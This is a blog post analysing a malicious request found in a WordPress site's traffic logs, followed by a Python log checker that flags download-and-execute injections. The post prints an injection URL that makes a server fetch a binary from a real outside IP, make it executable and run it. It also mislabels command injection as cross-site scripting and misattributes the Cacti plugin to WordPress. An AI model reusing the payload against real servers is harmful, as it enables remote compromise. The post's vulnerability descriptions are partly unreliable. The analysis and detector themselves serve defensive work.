Going through my Wordfence live traffic view is a nice way to see the daily fad of Chinese script kiddies.
WordPress is one of the main targets of people trying to access your data. Obviously, if you have a blog you must be sure you run an A+ certified security setup. See my other posts on this:
Security: Maintaining a secure WordPress blog
“A” Rating Security – Strong SSL Security WordPress Blog
Today I got this nice request repeated several times from several Chinese IPs.
https://blog.voina.fr/plugins/weathermap/configs/conn.php?id=wget%20http://182.18.8.69:8088/nkrb;chmod%20777%20nkrb;./nkrb
Let’s make a quick check of the request:
STEP 1: The attack vector:
It seems there is a vulnerability in one of the weather PHP plugins (Cacti) that can be installed on a WordPress site. The hint is in the URL path:
.../plugins/weathermap/configs/conn.php?id=
It seems that this plugin has a conn.php that does no escaping of its parameters, so it is open to a cross-site scripting attack. Maybe a known issue that is no longer valid in newer versions, but still valid for a lot of installs.
STEP 2: The attack load
wget%20http://182.18.8.69:8088/nkrb;chmod%20777%20nkrb;./nkrb
This is an interesting attack load targeted at Linux. It is a clear indication that the attacker is checking the OS of the target.
The whole string is a sequence of Linux command line items.
First, a file is downloaded from a repository machine:
wget http://182.18.8.69:8088/nkrb
The machine is listed as an attack vector site.
The downloaded binary is made executable:
chmod 777 nkrb
The binary is executed:
./nkrb
Probably the binary is ransomware or a crypto-mining binary.
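As an added example (not part of the original post), here is a small Python checker that URL-decodes the query parameters of access-log lines and flags the download-then-execute chain analysed above, pulling out the download host so it can be blocked or hunted for. It also recognises curl and `&&`/`||` chained variants; the log lines and source IPs are constructed.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Commands that fetch a remote file. A parameter that both fetches a file and
# then runs something locally is the download-and-execute pattern seen above.
DOWNLOADERS = {"wget", "curl", "tftp"}
# Shell command separators an injected chain can use.
SEPARATORS = re.compile(r"\|\||&&|[;|\n]")

def query_params(url):
    """Decode query parameters by hand: older parse_qsl versions also split on
    ';', which would tear the injected command chain apart."""
    for pair in urlsplit(url).query.split("&"):
        name, _, value = pair.partition("=")
        yield unquote_plus(name), unquote_plus(value)

def analyse_request(url):
    """Return a finding dict if any parameter carries a download-then-execute
    chain, otherwise None."""
    for name, value in query_params(url):
        stages = [s.split() for s in SEPARATORS.split(value) if s.strip()]
        fetch = [s for s in stages if s[0] in DOWNLOADERS]
        run = [s for s in stages if s[0].startswith("./") or s[0] in ("sh", "bash")]
        if fetch and run:
            remote = next((a for a in fetch[0][1:] if "://" in a), "")
            return {
                "param": name,
                "download_host": urlsplit(remote).netloc,  # host:port to block
                "executed": " ".join(run[0]),
                "chmod": any(s[0] == "chmod" for s in stages),
            }
    return None

def scan_log(lines):
    """Apply analyse_request to access-log lines of the form 'IP ... "GET URL'."""
    findings = []
    for line in lines:
        m = re.match(r'(\S+) .*?"GET (\S+)', line)
        if m and (finding := analyse_request(m.group(2))):
            findings.append(dict(finding, source_ip=m.group(1)))
    return findings

# Constructed sample log lines: the request from the post and a benign search.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2019:10:00:00 +0100] "GET /plugins/weathermap/configs/conn.php?id=wget%20http://182.18.8.69:8088/nkrb;chmod%20777%20nkrb;./nkrb HTTP/1.1" 404 0',
    '198.51.100.2 - - [01/Jan/2019:10:00:01 +0100] "GET /?s=weather+map HTTP/1.1" 200 1234',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f)
```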